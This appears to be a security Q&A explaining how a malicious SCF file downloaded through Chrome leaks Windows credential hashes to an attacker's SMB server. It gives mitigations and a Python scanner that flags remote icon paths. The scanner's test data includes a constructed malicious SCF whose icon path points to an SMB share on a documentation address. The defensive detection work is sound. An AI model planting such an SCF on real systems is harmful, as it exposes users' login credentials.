I recently read that a vulnerability in Google Chrome could enable hackers to remotely steal user login credentials on Windows systems. How does this vulnerability work? Are there any extra steps users can take to protect their credentials?
This vulnerability was uncovered by DefenseCode researcher Bosko Stankovic when he used Google Chrome to visit a website. The website contained a malicious shell command file (SCF).
The legitimate SCF shortcut file format works much like Windows LNK shortcut files, such as the My Computer and Recycle Bin shortcuts. Windows forces LNK files to load their icons from local resources, but it places no such restriction on where an SCF file's icon may be loaded from.
Stankovic demonstrated how an SCF file can send a victim's Windows login credentials to an attacker's server message block (SMB) server. SMB is the protocol Windows uses for sharing files and printers.
The attack starts the moment the victim's machine connects to the attacker's SMB server. The user is unaware that a file has been automatically downloaded onto his local computer, because the victim is never prompted to confirm the download.
When the user opens the folder containing the downloaded file, Windows processes the malicious file without waiting for the user to confirm anything and automatically tries to retrieve its icon. The malicious SCF file doesn't point at a local icon image; instead, it contains the location of the attacker's SMB server.
During the attack, Windows doesn't ask the victim to enter local or network login credentials, because the credentials are sent to the SMB server automatically. The attacker can use the captured password in its hashed form to log in to the user's OneDrive, Outlook, Office 365 and other Microsoft accounts; there is no need to crack the password hash first.
To prevent SMB server authentication attacks, users should:
- Block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewalls.
- Disable automatic downloads in Chrome.
- Configure Chrome properly.
- Change passwords more often.
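Because the only thing that distinguishes a malicious SCF from a harmless one is where its icon is loaded from, a downloads folder can be checked for SCF files whose icon path points at a remote SMB share. The scanner below is an added example written for this answer, not code from DefenseCode or TechTarget; the two SCF bodies are constructed samples, and the remote one uses an RFC 5737 documentation address rather than any real host.

```python
import re
import sys
from pathlib import Path

# An icon path beginning with \\host\share is a UNC reference: opening the
# folder makes Explorer authenticate to that host over SMB to fetch the icon.
# The \\?\ and \\.\ prefixes are local device paths, so they are not matched.
UNC_HOST = re.compile(r"^\\\\([^\\?.][^\\]*)\\")


def parse_scf(text):
    """Parse an INI-style SCF body into {section: {key: value}}, keys lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def remote_icon_host(text):
    """Return the SMB host an SCF's icon is loaded from, or None if the icon is local."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    match = UNC_HOST.match(icon)
    return match.group(1) if match else None


def scan_folder(folder):
    """Return [(path, host)] for every .scf under folder whose icon is remote."""
    hits = []
    for path in Path(folder).rglob("*.scf"):
        host = remote_icon_host(path.read_text(errors="replace"))
        if host:
            hits.append((str(path), host))
    return hits


# Constructed samples: a Show Desktop style SCF with a local icon, and one
# whose icon would be fetched from a share on a documentation-only address.
BENIGN_SCF = "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n[Taskbar]\nCommand=ToggleDesktop\n"
REMOTE_SCF = "[Shell]\nCommand=2\nIconFile=\\\\192.0.2.10\\share\\icon.ico\n[Taskbar]\nCommand=ToggleDesktop\n"

if __name__ == "__main__":
    for path, host in scan_folder(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: icon loads from SMB host {host}")
```

Run it against the Chrome downloads directory; any hit is a file that would trigger an outbound SMB authentication as soon as the folder is opened in Explorer.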